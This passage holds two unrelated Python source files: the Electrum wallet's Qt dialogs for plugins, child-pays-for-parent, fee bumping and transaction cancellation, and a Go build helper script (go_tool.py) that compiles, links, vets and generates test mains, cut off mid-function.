        def do_toggle(cb, name, i):
            p = plugins.toggle(name)
            cb.setChecked(bool(p))
            enable_settings_widget(p, name, i)
        # note: all enabled plugins will receive this hook:
        run_hook('init_qt', self.gui_object)
        for i, descr in enumerate(plugins.descriptions.values()):
            full_name = descr['__name__']
            prefix, _separator, name = full_name.rpartition('.')
            p = plugins.get(name)
            if descr.get('registers_keystore'):
                # keystore (hardware wallet) plugins are not toggleable here
                continue
            try:
                cb = QCheckBox(descr['fullname'])
                plugin_is_loaded = p is not None
                cb_enabled = (not plugin_is_loaded and plugins.is_available(name, self.wallet)
                              or plugin_is_loaded and p.can_user_disable())
                cb.setEnabled(cb_enabled)
                cb.setChecked(plugin_is_loaded and p.is_enabled())
                grid.addWidget(cb, i, 0)
                enable_settings_widget(p, name, i)
                cb.clicked.connect(partial(do_toggle, cb, name, i))
                msg = descr['description']
                if descr.get('requires'):
                    msg += '\n\n' + _('Requires') + ':\n' + '\n'.join(map(lambda x: x[1], descr.get('requires')))
                grid.addWidget(HelpButton(msg), i, 2)
            except Exception:
                self.logger.exception(f"cannot display plugin {name}")
        grid.setRowStretch(len(plugins.descriptions.values()), 1)
        vbox.addLayout(Buttons(CloseButton(d)))
        d.exec_()
    def cpfp_dialog(self, parent_tx: Transaction) -> None:
        """Child-Pays-For-Parent dialog: build a child tx spending output 0 of
        *parent_tx* back to the wallet with a user-chosen fee, so the combined
        fee rate lifts the unconfirmed parent."""
        # zero-fee probe child, used only to learn sizes/amounts
        new_tx = self.wallet.cpfp(parent_tx, 0)
        total_size = parent_tx.estimated_size() + new_tx.estimated_size()
        parent_txid = parent_tx.txid()
        assert parent_txid
        parent_fee = self.wallet.get_tx_fee(parent_txid)
        if parent_fee is None:
            self.show_error(_("Can't CPFP: unknown fee for parent transaction."))
            return
        d = WindowModalDialog(self, _('Child Pays for Parent'))
        vbox = QVBoxLayout(d)
        msg = (
            "A CPFP is a transaction that sends an unconfirmed output back to "
            "yourself, with a high fee. The goal is to have miners confirm "
            "the parent transaction in order to get the fee attached to the "
            "child transaction.")
        vbox.addWidget(WWLabel(_(msg)))
        msg2 = ("The proposed fee is computed using your "
            "fee/kB settings, applied to the total size of both child and "
            "parent transactions. After you broadcast a CPFP transaction, "
            "it is normal to see a new unconfirmed transaction in your history.")
        vbox.addWidget(WWLabel(_(msg2)))
        grid = QGridLayout()
        grid.addWidget(QLabel(_('Total size') + ':'), 0, 0)
        grid.addWidget(QLabel('%d bytes'% total_size), 0, 1)
        max_fee = new_tx.output_value()
        grid.addWidget(QLabel(_('Input amount') + ':'), 1, 0)
        grid.addWidget(QLabel(self.format_amount(max_fee) + ' ' + self.base_unit()), 1, 1)
        output_amount = QLabel('')
        grid.addWidget(QLabel(_('Output amount') + ':'), 2, 0)
        grid.addWidget(output_amount, 2, 1)
        fee_e = BTCAmountEdit(self.get_decimal_point)
        # FIXME with dyn fees, without estimates, there are all kinds of crashes here
        combined_fee = QLabel('')
        combined_feerate = QLabel('')
        def on_fee_edit(x):
            # recompute output amount plus combined fee/feerate from child fee
            fee_for_child = fee_e.get_amount()
            if fee_for_child is None:
                return
            out_amt = max_fee - fee_for_child
            out_amt_str = (self.format_amount(out_amt) + ' ' + self.base_unit()) if out_amt else ''
            output_amount.setText(out_amt_str)
            comb_fee = parent_fee + fee_for_child
            comb_fee_str = (self.format_amount(comb_fee) + ' ' + self.base_unit()) if comb_fee else ''
            combined_fee.setText(comb_fee_str)
            comb_feerate = comb_fee / total_size * 1000
            comb_feerate_str = self.format_fee_rate(comb_feerate) if comb_feerate else ''
            combined_feerate.setText(comb_feerate_str)
        fee_e.textChanged.connect(on_fee_edit)
        def get_child_fee_from_total_feerate(fee_per_kb):
            fee = fee_per_kb * total_size / 1000 - parent_fee
            fee = min(max_fee, fee)
            fee = max(total_size, fee)  # pay at least 1 sat/byte for combined size
            return fee
        suggested_feerate = self.config.fee_per_kb()
        if suggested_feerate is None:
            self.show_error(f'''{_("Can't CPFP'")}: {_('Dynamic fee estimates not available')}''')
            return
        fee = get_child_fee_from_total_feerate(suggested_feerate)
        fee_e.setAmount(fee)
        grid.addWidget(QLabel(_('Fee for child') + ':'), 3, 0)
        grid.addWidget(fee_e, 3, 1)
        def on_rate(dyn, pos, fee_rate):
            fee = get_child_fee_from_total_feerate(fee_rate)
            fee_e.setAmount(fee)
        fee_slider = FeeSlider(self, self.config, on_rate)
        fee_combo = FeeComboBox(fee_slider)
        fee_slider.update()
        grid.addWidget(fee_slider, 4, 1)
        grid.addWidget(fee_combo, 4, 2)
        grid.addWidget(QLabel(_('Total fee') + ':'), 5, 0)
        grid.addWidget(combined_fee, 5, 1)
        grid.addWidget(QLabel(_('Total feerate') + ':'), 6, 0)
        grid.addWidget(combined_feerate, 6, 1)
        vbox.addLayout(grid)
        vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
        if not d.exec_():
            return
        fee = fee_e.get_amount()
        if fee is None:
            return  # fee left empty, treat is as "cancel"
        if fee > max_fee:
            self.show_error(_('Max fee exceeded'))
            return
        try:
            new_tx = self.wallet.cpfp(parent_tx, fee)
        except CannotCPFP as e:
            self.show_error(str(e))
            return
        new_tx.set_rbf(True)
        self.show_transaction(new_tx)
    def _add_info_to_tx_from_wallet_and_network(self, tx: PartialTransaction) -> bool:
        """Returns whether successful. Blocks the GUI with a waiting dialog while
        input info is added (possibly fetched over the network); shows an error
        dialog and returns False on a network failure."""
        # note side-effect: tx is being mutated
        assert isinstance(tx, PartialTransaction)
        try:
            # note: this might download input utxos over network
            BlockingWaitingDialog(
                self,
                _("Adding info to tx, from wallet and network..."),
                lambda: tx.add_info_from_wallet(self.wallet, ignore_network_issues=False),
            )
        except NetworkException as e:
            self.show_error(repr(e))
            return False
        return True
    def bump_fee_dialog(self, tx: Transaction):
        """RBF fee-bump dialog for *tx*: choose a new fee rate (slider or manual),
        optionally mark the replacement final, then show it for signing."""
        txid = tx.txid()
        assert txid
        if not isinstance(tx, PartialTransaction):
            tx = PartialTransaction.from_tx(tx)
        if not self._add_info_to_tx_from_wallet_and_network(tx):
            return
        fee = tx.get_fee()
        assert fee is not None
        tx_label = self.wallet.get_label_for_txid(txid)
        tx_size = tx.estimated_size()
        old_fee_rate = fee / tx_size  # sat/vbyte
        d = WindowModalDialog(self, _('Bump Fee'))
        vbox = QVBoxLayout(d)
        vbox.addWidget(WWLabel(_("Increase your transaction's fee to improve its position in mempool.")))
        grid = QGridLayout()
        grid.addWidget(QLabel(_('Current Fee') + ':'), 0, 0)
        grid.addWidget(QLabel(self.format_amount(fee) + ' ' + self.base_unit()), 0, 1)
        grid.addWidget(QLabel(_('Current Fee rate') + ':'), 1, 0)
        grid.addWidget(QLabel(self.format_fee_rate(1000 * old_fee_rate)), 1, 1)
        grid.addWidget(QLabel(_('New Fee rate') + ':'), 2, 0)
        def on_textedit_rate():
            # manual entry overrides the slider
            fee_slider.deactivate()
        feerate_e = FeerateEdit(lambda: 0)
        feerate_e.setAmount(max(old_fee_rate * 1.5, old_fee_rate + 1))
        feerate_e.textEdited.connect(on_textedit_rate)
        grid.addWidget(feerate_e, 2, 1)
        def on_slider_rate(dyn, pos, fee_rate):
            fee_slider.activate()
            if fee_rate is not None:
                feerate_e.setAmount(fee_rate / 1000)
        fee_slider = FeeSlider(self, self.config, on_slider_rate)
        fee_combo = FeeComboBox(fee_slider)
        fee_slider.deactivate()
        grid.addWidget(fee_slider, 3, 1)
        grid.addWidget(fee_combo, 3, 2)
        vbox.addLayout(grid)
        cb = QCheckBox(_('Final'))
        vbox.addWidget(cb)
        vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
        if not d.exec_():
            return
        is_final = cb.isChecked()
        new_fee_rate = feerate_e.get_amount()
        try:
            new_tx = self.wallet.bump_fee(
                tx=tx,
                txid=txid,
                new_fee_rate=new_fee_rate,
                coins=self.get_coins(),
            )
        except CannotBumpFee as e:
            self.show_error(str(e))
            return
        if is_final:
            new_tx.set_rbf(False)
        self.show_transaction(new_tx, tx_desc=tx_label)
    def dscancel_dialog(self, tx: Transaction):
        """Cancel an unconfirmed RBF *tx* by double-spending its inputs back to
        the wallet at a higher, user-chosen fee rate."""
        txid = tx.txid()
        assert txid
        if not isinstance(tx, PartialTransaction):
            tx = PartialTransaction.from_tx(tx)
        if not self._add_info_to_tx_from_wallet_and_network(tx):
            return
        fee = tx.get_fee()
        assert fee is not None
        tx_size = tx.estimated_size()
        old_fee_rate = fee / tx_size  # sat/vbyte
        d = WindowModalDialog(self, _('Cancel transaction'))
        vbox = QVBoxLayout(d)
        vbox.addWidget(WWLabel(_("Cancel an unconfirmed RBF transaction by double-spending "
                                 "its inputs back to your wallet with a higher fee.")))
        grid = QGridLayout()
        grid.addWidget(QLabel(_('Current Fee') + ':'), 0, 0)
        grid.addWidget(QLabel(self.format_amount(fee) + ' ' + self.base_unit()), 0, 1)
        grid.addWidget(QLabel(_('Current Fee rate') + ':'), 1, 0)
        grid.addWidget(QLabel(self.format_fee_rate(1000 * old_fee_rate)), 1, 1)
        grid.addWidget(QLabel(_('New Fee rate') + ':'), 2, 0)
        def on_textedit_rate():
            # manual entry overrides the slider
            fee_slider.deactivate()
        feerate_e = FeerateEdit(lambda: 0)
        feerate_e.setAmount(max(old_fee_rate * 1.5, old_fee_rate + 1))
        feerate_e.textEdited.connect(on_textedit_rate)
        grid.addWidget(feerate_e, 2, 1)
        def on_slider_rate(dyn, pos, fee_rate):
            fee_slider.activate()
            if fee_rate is not None:
                feerate_e.setAmount(fee_rate / 1000)
        fee_slider = FeeSlider(self, self.config, on_slider_rate)
        fee_combo = FeeComboBox(fee_slider)
        fee_slider.deactivate()
        grid.addWidget(fee_slider, 3, 1)
        grid.addWidget(fee_combo, 3, 2)
        vbox.addLayout(grid)
        vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
        if not d.exec_():
            return
        new_fee_rate = feerate_e.get_amount()
        try:
            new_tx = self.wallet.dscancel(tx=tx, new_fee_rate=new_fee_rate)
        except CannotDoubleSpendTx as e:
            self.show_error(str(e))
            return
        self.show_transaction(new_tx)
    def save_transaction_into_wallet(self, tx: Transaction):
        """Add an offline transaction to the wallet history; True on success."""
        win = self.top_level_window()
        try:
            if not self.wallet.add_transaction(tx):
                win.show_error(_("Transaction could not be saved.") + "\n" +
                               _("It conflicts with current history."))
                return False
        except AddTransactionException as e:
            win.show_error(e)
            return False
        else:
            self.wallet.save_db()
            # need to update at least: history_list, utxo_list, address_list
            self.need_update.set()
            msg = (_("Transaction added to wallet history.") + '\n\n' +
                   _("Note: this is an offline transaction, if you want the network "
                     "to see it, you need to broadcast it."))
            win.msg_box(QPixmap(icon_path("offline_tx.png")), None, _('Success'), msg)
            return True
    def show_cert_mismatch_error(self):
        """Warn once about a --serverfingerprint mismatch, then close the window."""
        # re-entrancy guard: the error can be raised repeatedly by the network side
        if self.showing_cert_mismatch_error:
            return
        self.showing_cert_mismatch_error = True
        self.show_critical(title=_("Certificate mismatch"),
                           msg=_("The SSL certificate provided by the main server did not match the fingerprint passed in with the --serverfingerprint option.") + "\n\n" +
                               _("Electrum will now exit."))
        self.showing_cert_mismatch_error = False
        self.close()
|
go_tool.py | import argparse
import copy
import json
import os
import shutil
import subprocess
import sys
import tempfile
import threading
# Prefix prepended to repo-relative paths to form public Go import paths.
arc_project_prefix = 'a.yandex-team.ru/'
# Location of the vendored Go standard library sources inside the repo.
std_lib_prefix = 'contrib/go/_std/src/'
# Conventional vendor directory prefix for third-party Go packages.
vendor_prefix = 'vendor/'
def compare_versions(version1, version2):
    """Compare two dotted version strings.

    Returns 0 when equal, 1 when version1 is older than version2,
    and -1 when version1 is newer.
    """
    def normalize(version):
        # zero-pad each numeric component so lexicographic == numeric order
        return tuple(str(int(part)).zfill(8) for part in version.split('.'))

    left = normalize(version1)
    right = normalize(version2)
    if left == right:
        return 0
    return 1 if left < right else -1
def get_symlink_or_copyfile():
    """Return os.symlink where available, else shutil.copyfile as a fallback."""
    return getattr(os, 'symlink', shutil.copyfile)
def copy_args(args):
    """Shallow-copy an argument namespace (nested objects remain shared)."""
    return copy.copy(args)
def get_vendor_index(import_path):
    """Locate the last 'vendor/' component in *import_path*.

    Returns 0 when the path itself starts with 'vendor/', -1 when there is
    no vendor component, and otherwise the offset just past the '/' that
    precedes the vendor directory.
    """
    pos = import_path.rfind('/' + vendor_prefix)
    if pos >= 0:
        return pos + 1
    return 0 if import_path.startswith(vendor_prefix) else -1
def get_import_path(module_path):
    """Map a repo-relative module path to (go_import_path, is_std_module).

    Std-lib and vendored paths have their prefixes stripped; everything
    else gets the arcadia project prefix prepended.
    """
    assert len(module_path) > 0
    normalized = module_path.replace('\\', '/')
    is_std = normalized.startswith(std_lib_prefix)
    if is_std:
        result = normalized[len(std_lib_prefix):]
    elif normalized.startswith(vendor_prefix):
        result = normalized[len(vendor_prefix):]
    else:
        result = arc_project_prefix + normalized
    assert len(result) > 0
    return result, is_std
def call(cmd, cwd, env=None):
    """Run *cmd* in *cwd* and return its combined stdout+stderr.

    Raises subprocess.CalledProcessError on a non-zero exit status.
    """
    # print >>sys.stderr, ' '.join(cmd)
    return subprocess.check_output(cmd, stdin=None, stderr=subprocess.STDOUT, cwd=cwd, env=env)
def classify_srcs(srcs, args):
    """Partition *srcs* by extension into attributes on *args*.

    Sets args.go_srcs (.go), args.asm_srcs (.s), args.objects (.o/.obj),
    args.symabis (.symabis) and args.sysos (.syso).
    """
    def with_suffix(*suffixes):
        return [src for src in srcs if src.endswith(suffixes)]

    args.go_srcs = with_suffix('.go')
    args.asm_srcs = with_suffix('.s')
    args.objects = with_suffix('.o', '.obj')
    args.symabis = with_suffix('.symabis')
    args.sysos = with_suffix('.syso')
def get_import_config_info(peers, gen_importmap, import_map={}, module_map={}):
    """Gather importcfg entries (importmap / packagefile / standard) for *peers*.

    NOTE(review): reads a module-global ``args`` for ``args.build_root``, so
    this is only valid after command-line parsing has run — confirm against
    the file's __main__ section. The mutable default arguments are read-only
    here, so sharing them across calls is currently harmless.
    """
    info = {'importmap': [], 'packagefile': [], 'standard': {}}
    if gen_importmap:
        for key, value in import_map.items():
            info['importmap'].append((key, value))
    for peer in peers:
        peer_import_path, is_std = get_import_path(os.path.dirname(peer))
        if gen_importmap:
            index = get_vendor_index(peer_import_path)
            if index >= 0:
                # map the short (vendor-stripped) name to the full path
                index += len(vendor_prefix)
                info['importmap'].append((peer_import_path[index:], peer_import_path))
        info['packagefile'].append((peer_import_path, os.path.join(args.build_root, peer)))
        if is_std:
            info['standard'][peer_import_path] = True
    for key, value in module_map.items():
        info['packagefile'].append((key, value))
    return info
def create_import_config(peers, gen_importmap, import_map={}, module_map={}):
    """Write an importcfg file for the Go compiler/linker and return its path,
    or None when there are no entries.

    The temp file is kept on disk (delete=False) for the later tool run.
    NOTE(review): writes str to a binary-mode NamedTemporaryFile — valid on
    Python 2 (which this file targets), would need encoding on Python 3.
    """
    lines = []
    info = get_import_config_info(peers, gen_importmap, import_map, module_map)
    for key in ('importmap', 'packagefile'):
        for item in info[key]:
            lines.append('{} {}={}'.format(key, *item))
    if len(lines) > 0:
        lines.append('')
        content = '\n'.join(lines)
        # print >>sys.stderr, content
        with tempfile.NamedTemporaryFile(delete=False) as f:
            f.write(content)
            return f.name
    return None
def vet_info_output_name(path):
    """Name of the vet metadata (.vet.out) file derived from *path*."""
    return '{}.vet.out'.format(path)
def vet_report_output_name(path):
    """Name of the human-readable vet report (.vet.txt) file for *path*."""
    return '{}.vet.txt'.format(path)
def get_source_path(args):
    """Prefer the explicit test import path, falling back to the module path."""
    if args.test_import_path:
        return args.test_import_path
    return args.module_path
def gen_vet_info(args):
    """Build the config dict handed to the `go vet` driver as JSON.

    Collects import maps, package files and std markers for the current
    compilation unit; per-dependency vetx files are derived with
    vet_info_output_name. Field set presumably matches x/tools'
    unitchecker config — TODO confirm against the vet binary in use.
    """
    import_path = args.real_import_path if hasattr(args, 'real_import_path') else args.import_path
    info = get_import_config_info(args.peers, True, args.import_map, args.module_map)
    import_map = dict(info['importmap'])
    # FIXME(snermolaev): it seems that adding import map for 'fake' package
    # does't make any harm (it needs to be revised later)
    import_map['unsafe'] = 'unsafe'
    for (key, _) in info['packagefile']:
        if key not in import_map:
            import_map[key] = key
    data = {
        'ID': import_path,
        'Compiler': 'gc',
        'Dir': os.path.join(args.arc_source_root, get_source_path(args)),
        'ImportPath': import_path,
        'GoFiles': list(filter(lambda x: x.endswith('.go'), args.go_srcs)),
        'NonGoFiles': list(filter(lambda x: not x.endswith('.go'), args.go_srcs)),
        'ImportMap': import_map,
        'PackageFile': dict(info['packagefile']),
        'Standard': dict(info['standard']),
        'PackageVetx': dict((key, vet_info_output_name(value)) for key, value in info['packagefile']),
        'VetxOnly': False,
        'VetxOutput': vet_info_output_name(args.output),
        'SucceedOnTypecheckFailure': False
    }
    # print >>sys.stderr, json.dumps(data, indent=4)
    return data
def create_vet_config(args, info):
    """Serialize *info* to a persistent temp .cfg file for `go vet`; return its path.

    NOTE(review): writes str into a binary-mode NamedTemporaryFile — fine on
    Python 2 (this file's target), would need .encode() on Python 3.
    """
    with tempfile.NamedTemporaryFile(delete=False, suffix='.cfg') as f:
        f.write(json.dumps(info))
        return f.name
def decode_vet_report(json_report):
    """Convert `go vet -json` output into sorted 'position: message' lines.

    Falls back to returning the raw text when it is not valid JSON (e.g.
    plain error output). NOTE(review): JSONDecoder(encoding=...) and
    dict.iteritems() are Python-2-only APIs.
    """
    report = ''
    if json_report:
        try:
            full_diags = json.JSONDecoder(encoding='UTF-8').decode(json_report)
        except ValueError:
            # not JSON: pass vet's raw output through unchanged
            report = json_report
        else:
            messages = []
            for _, module_diags in full_diags.iteritems():
                for _, type_diags in module_diags.iteritems():
                    for diag in type_diags:
                        messages.append(u'{}: {}'.format(diag['posn'], diag['message']))
            report = '\n'.join(sorted(messages)).encode('UTF-8')
    return report
def dump_vet_report(args, report):
    """Write *report* to args.vet_report_output, masking build/source roots.

    Does nothing when the report is empty; build and source root paths are
    replaced with '$B' and '$S' placeholders before writing.
    """
    if not report:
        return
    masked = report.replace(args.build_root, '$B').replace(args.arc_source_root, '$S')
    with open(args.vet_report_output, 'w') as out:
        out.write(masked)
def read_vet_report(args):
    """Return the saved vet report text, or '' when none was produced."""
    assert args
    if not os.path.exists(args.vet_report_output):
        return ''
    with open(args.vet_report_output, 'r') as fh:
        return fh.read()
def dump_vet_report_for_tests(args, *test_args_list):
    """Concatenate the vet reports of every non-None test arg-set and dump
    the merged text to args.vet_report_output.

    The original used the bare builtin ``reduce``, which exists only on
    Python 2; ``str.join`` produces the same concatenation and runs on
    both Python 2 and 3.
    """
    merged = ''.join(read_vet_report(t) for t in test_args_list if t)
    dump_vet_report(args, merged)
def do_vet(args):
    """Run `go vet` for the current package and persist its (masked) report.

    Raises subprocess.CalledProcessError when vet exits non-zero, with vet's
    stderr attached as the exception output.
    """
    assert args.vet
    info = gen_vet_info(args)
    vet_config = create_vet_config(args, info)
    cmd = [args.go_vet, '-json']
    if args.vet_flags:
        cmd.extend(args.vet_flags)
    cmd.append(vet_config)
    p_vet = subprocess.Popen(cmd, stdin=None, stderr=subprocess.PIPE, stdout=subprocess.PIPE, cwd=args.build_root)
    vet_out, vet_err = p_vet.communicate()
    report = decode_vet_report(vet_out) if vet_out else ''
    dump_vet_report(args, report)
    if p_vet.returncode:
        raise subprocess.CalledProcessError(returncode=p_vet.returncode, cmd=cmd, output=vet_err)
def _do_compile_go(args):
    """Invoke the Go compiler over args.go_srcs, producing args.output.

    Handles std-module flags, the runtime package's special mode, importcfg
    generation, -asmhdr export and Go-version-dependent options.
    """
    import_path, is_std_module = args.import_path, args.is_std
    cmd = [args.go_compile, '-o', args.output, '-trimpath', args.arc_source_root, '-p', import_path, '-D', '""']
    cmd += ['-goversion', 'go' + args.goversion]
    if is_std_module:
        cmd.append('-std')
        # the runtime package is compiled in the special -+ mode
        if import_path == 'runtime' or import_path.startswith('runtime/internal/'):
            cmd.append('-+')
    import_config_name = create_import_config(args.peers, True, args.import_map, args.module_map)
    if import_config_name:
        cmd += ['-importcfg', import_config_name]
    else:
        if import_path == 'unsafe' or len(args.objects) > 0 or args.asmhdr:
            pass
        else:
            # no external deps and no asm parts: package is self-contained
            cmd.append('-complete')
    if args.asmhdr:
        cmd += ['-asmhdr', args.asmhdr]
    if compare_versions('1.12', args.goversion) >= 0:
        if args.symabis:
            cmd += ['-symabis'] + args.symabis
        if compare_versions('1.13', args.goversion) >= 0:
            pass
        elif import_path in ('runtime', 'runtime/internal/atomic'):
            cmd.append('-allabis')
    compile_workers = '4'
    if args.compile_flags:
        cmd += args.compile_flags
        # race detector builds are restricted to a single compile worker
        if '-race' in args.compile_flags:
            compile_workers = '1'
    cmd += ['-pack', '-c={}'.format(compile_workers)]
    cmd += args.go_srcs
    call(cmd, args.build_root)
class VetThread(threading.Thread):
    """Thread that captures, instead of printing, any exception from its target.

    NOTE(review): join_with_exception uses the three-argument raise form,
    which is Python-2-only syntax; this file as a whole targets Python 2.
    """
    def __init__(self, target, args):
        super(VetThread, self).__init__(target=target, args=args)
        # (type, value, traceback) of the exception raised in run(), if any
        self.exc_info = None
    def run(self):
        try:
            super(VetThread, self).run()
        except:
            # remember the failure for re-raise on the joining thread
            self.exc_info = sys.exc_info()
    def join_with_exception(self, reraise_exception):
        """Join the thread; re-raise its captured exception when requested."""
        self.join()
        if reraise_exception and self.exc_info:
            raise self.exc_info[0], self.exc_info[1], self.exc_info[2]
def do_compile_go(args):
    """Compile Go sources, optionally running `go vet` in parallel.

    vet runs in a background thread; its failure is re-raised only when
    compilation itself succeeded, so compiler errors take precedence.
    """
    raise_exception_from_vet = False
    if args.vet:
        run_vet = VetThread(target=do_vet, args=(args,))
        run_vet.start()
    try:
        _do_compile_go(args)
        raise_exception_from_vet = True
    finally:
        if args.vet:
            run_vet.join_with_exception(raise_exception_from_vet)
def do_compile_asm(args):
    """Assemble the single .s source listed in args into args.output."""
    assert len(args.srcs) == 1 and len(args.asm_srcs) == 1
    command = [
        args.go_asm,
        '-trimpath', args.arc_source_root,
        '-I', args.output_root,
        '-I', os.path.join(args.pkg_root, 'include'),
        '-D', 'GOOS_' + args.targ_os,
        '-D', 'GOARCH_' + args.targ_arch,
        '-o', args.output,
    ]
    if args.asm_flags:
        command += args.asm_flags
    command += args.asm_srcs
    call(command, args.build_root)
def do_link_lib(args):
    """Build a Go package archive: compile .go (and .s) sources, then pack extra objects."""
    if len(args.asm_srcs) > 0:
        asmargs = copy_args(args)
        # compiling Go with -asmhdr first produces go_asm.h for the assembler
        asmargs.asmhdr = os.path.join(asmargs.output_root, 'go_asm.h')
        do_compile_go(asmargs)
        for src in asmargs.asm_srcs:
            asmargs.srcs = [src]
            asmargs.asm_srcs = [src]
            asmargs.output = os.path.join(asmargs.output_root, os.path.basename(src) + '.o')
            do_compile_asm(asmargs)
            args.objects.append(asmargs.output)
    else:
        do_compile_go(args)
    if args.objects:
        # append assembled/object/syso files into the package archive
        cmd = [args.go_pack, 'r', args.output] + args.objects + args.sysos
        call(cmd, args.build_root)
def do_link_exe(args):
    """Link an executable: build the 'main' package archive, then run the Go linker."""
    assert args.extld is not None
    assert args.non_local_peers is not None
    compile_args = copy_args(args)
    compile_args.output = os.path.join(args.output_root, 'main.a')
    compile_args.real_import_path = compile_args.import_path
    compile_args.import_path = 'main'
    # NOTE(review): mixes args.vcs and compile_args.vcs — same value, since
    # compile_args is a shallow copy of args.
    if args.vcs and os.path.isfile(compile_args.vcs):
        build_info = os.path.join('library', 'go', 'core', 'buildinfo')
        if any(map(lambda x: x.startswith(build_info), compile_args.peers)):
            compile_args.go_srcs.append(compile_args.vcs)
    do_link_lib(compile_args)
    cmd = [args.go_link, '-o', args.output]
    import_config_name = create_import_config(args.peers + args.non_local_peers, False, args.import_map, args.module_map)
    if import_config_name:
        cmd += ['-importcfg', import_config_name]
    if args.link_flags:
        cmd += args.link_flags
    cmd += ['-buildmode=exe', '-extld={}'.format(args.extld)]
    extldflags = []
    if args.extldflags is not None:
        extldflags += args.extldflags
    if args.cgo_peers is not None and len(args.cgo_peers) > 0:
        # on linux, group cgo archives so the external linker can resolve
        # mutual references between them
        is_group = args.targ_os == 'linux'
        if is_group:
            extldflags.append('-Wl,--start-group')
        extldflags.extend(os.path.join(args.build_root, x) for x in args.cgo_peers)
        if is_group:
            extldflags.append('-Wl,--end-group')
    if len(extldflags) > 0:
        cmd.append('-extldflags=' + ' '.join(extldflags))
    cmd.append(compile_args.output)
    call(cmd, args.build_root)
def gen_cover_info(args):
    """Emit Go source lines that register coverage counters with `testing`.

    args.cover_info holds 'var:file' pairs produced by the cover tool; each
    becomes a coverRegisterFile call in the generated init().
    """
    lines = []
    lines.extend([
        """
var (
    coverCounters = make(map[string][]uint32)
    coverBlocks = make(map[string][]testing.CoverBlock)
)
        """,
        'func init() {',
    ])
    for var, file in (x.split(':') for x in args.cover_info):
        lines.append('    coverRegisterFile("{file}", _cover0.{var}.Count[:], _cover0.{var}.Pos[:], _cover0.{var}.NumStmt[:])'.format(file=file, var=var))
    lines.extend([
        '}',
        """
func coverRegisterFile(fileName string, counter []uint32, pos []uint32, numStmts []uint16) {
    if 3*len(counter) != len(pos) || len(counter) != len(numStmts) {
        panic("coverage: mismatched sizes")
    }
    if coverCounters[fileName] != nil {
        // Already registered.
        return
    }
    coverCounters[fileName] = counter
    block := make([]testing.CoverBlock, len(counter))
    for i := range counter {
        block[i] = testing.CoverBlock{
            Line0: pos[3*i+0],
            Col0: uint16(pos[3*i+2]),
            Line1: pos[3*i+1],
            Col1: uint16(pos[3*i+2]>>16),
            Stmts: numStmts[i],
        }
    }
    coverBlocks[fileName] = block
}
        """,
    ])
    return lines
def gen_test_main(args, test_lib_args, xtest_lib_args):
    """Generate the source text of the synthetic test-main package.

    Mines Test/Benchmark/Example symbols from the compiled test libraries
    by running args.test_miner inside a throwaway GOPATH, then emits a
    main() that registers them with the testing package, honouring a
    user-provided TestMain and optional coverage instrumentation.

    Fixes over the previous version:
      * test_main_found / xtest_main_found are now initialized up front;
        previously each was only assigned inside its own branch, so e.g.
        `elif xtest_main_found:` raised NameError when no xtest lib was
        given and the internal tests lacked TestMain.
      * a missing comma after the MainStart line silently concatenated it
        with the intended empty string ('' list element restored).
    """
    assert args and (test_lib_args or xtest_lib_args)
    test_miner = args.test_miner
    test_module_path = test_lib_args.import_path if test_lib_args else xtest_lib_args.import_path
    is_cover = args.cover_info and len(args.cover_info) > 0
    # Prepare GOPATH
    # $BINDIR
    #    |- __go__
    #        |- src
    #        |- pkg
    #            |- ${TARGET_OS}_${TARGET_ARCH}
    go_path_root = os.path.join(args.output_root, '__go__')
    test_src_dir = os.path.join(go_path_root, 'src')
    target_os_arch = '_'.join([args.targ_os, args.targ_arch])
    test_pkg_dir = os.path.join(go_path_root, 'pkg', target_os_arch, os.path.dirname(test_module_path))
    os.makedirs(test_pkg_dir)
    my_env = os.environ.copy()
    my_env['GOROOT'] = ''
    my_env['GOPATH'] = go_path_root
    my_env['GOARCH'] = args.targ_arch
    my_env['GOOS'] = args.targ_os
    tests = []
    xtests = []
    # BUGFIX: initialize both flags so the elif chain below cannot hit an
    # unassigned name when one of the two branches is skipped.
    test_main_found = False
    xtest_main_found = False
    os_symlink = get_symlink_or_copyfile()
    # Get the list of "internal" tests
    if test_lib_args:
        os.makedirs(os.path.join(test_src_dir, test_module_path))
        os_symlink(test_lib_args.output, os.path.join(test_pkg_dir, os.path.basename(test_module_path) + '.a'))
        cmd = [test_miner, '-benchmarks', '-tests', test_module_path]
        tests = filter(lambda x: len(x) > 0, (call(cmd, test_lib_args.output_root, my_env) or '').strip().split('\n'))
        test_main_found = '#TestMain' in tests
    # Get the list of "external" tests
    if xtest_lib_args:
        xtest_module_path = xtest_lib_args.import_path
        os.makedirs(os.path.join(test_src_dir, xtest_module_path))
        os_symlink(xtest_lib_args.output, os.path.join(test_pkg_dir, os.path.basename(xtest_module_path) + '.a'))
        cmd = [test_miner, '-benchmarks', '-tests', xtest_module_path]
        xtests = filter(lambda x: len(x) > 0, (call(cmd, xtest_lib_args.output_root, my_env) or '').strip().split('\n'))
        xtest_main_found = '#TestMain' in xtests
    test_main_package = None
    if test_main_found and xtest_main_found:
        assert False, 'multiple definition of TestMain'
    elif test_main_found:
        test_main_package = '_test'
    elif xtest_main_found:
        test_main_package = '_xtest'
    shutil.rmtree(go_path_root)
    lines = ['package main', '', 'import (']
    if test_main_package is None:
        # no user TestMain: generated main() calls os.Exit itself
        lines.append(' "os"')
    lines.extend([' "testing"', ' "testing/internal/testdeps"'])
    if len(tests) > 0:
        lines.append(' _test "{}"'.format(test_module_path))
    if len(xtests) > 0:
        lines.append(' _xtest "{}"'.format(xtest_module_path))
    if is_cover:
        lines.append(' _cover0 "{}"'.format(test_module_path))
    lines.extend([')', ''])
    for kind in ['Test', 'Benchmark', 'Example']:
        lines.append('var {}s = []testing.Internal{}{{'.format(kind.lower(), kind))
        for test in list(filter(lambda x: x.startswith(kind), tests)):
            lines.append(' {{"{test}", _test.{test}}},'.format(test=test))
        for test in list(filter(lambda x: x.startswith(kind), xtests)):
            lines.append(' {{"{test}", _xtest.{test}}},'.format(test=test))
        lines.extend(['}', ''])
    if is_cover:
        lines.extend(gen_cover_info(args))
    lines.append('func main() {')
    if is_cover:
        lines.extend([
            ' testing.RegisterCover(testing.Cover{',
            ' Mode: "set",',
            ' Counters: coverCounters,',
            ' Blocks: coverBlocks,',
            ' CoveredPackages: "",',
            ' })',
        ])
    lines.extend([
        ' m := testing.MainStart(testdeps.TestDeps{}, tests, benchmarks, examples)',
        '',
    ])
    if test_main_package:
